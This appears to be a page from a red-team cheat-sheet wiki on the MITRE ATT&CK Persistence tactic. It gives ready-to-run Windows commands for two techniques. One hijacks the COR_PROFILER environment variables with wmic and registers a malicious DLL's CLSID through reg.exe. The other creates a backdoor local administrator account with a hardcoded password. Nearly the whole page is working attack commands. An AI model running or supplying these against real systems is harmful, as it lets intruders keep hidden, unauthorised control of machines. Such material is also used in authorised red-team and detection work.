Persistence

The adversary is trying to maintain their foothold. https://attack.mitre.org/tactics/TA0003/

PreviousLateral Movement NextPrivilege Escalation

Last updated 7 months ago

Persistence

The adversary is trying to maintain their foothold. https://attack.mitre.org/tactics/TA0003/

COR Profiler Variable Hijack

Source:

# deleting existing COR_PROFILER variable
wmic ENVIRONMENT where "name='COR_PROFILER'" delete

# creating COR_ENABLE_PROFILING variable and setting it to 1
wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="<system>",VariableValue="1"

# creating a new COR_PROFILER variable
wmic ENVIRONMENT create name="COR_PROFILER",username="<system>",VariableValue="<arbitrary CLSID>"

# adding registry keys for malicious DLL
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /V ThreadingModel /T REG_SZ /D Apartment /F
reg.exe add HKLM\Software\Classes\CLSID\<arbitrary CLSID>\InProcServer32 /VE /T REG_SZ /D "<malicious_DLL>" /F

Local Administrator Account Creation

net user burmat BURMAT123123123 /add
net localgroup administrators burmat /add 
net localgroup administrators

PreviousLateral Movement NextPrivilege Escalation

Last updated 7 months ago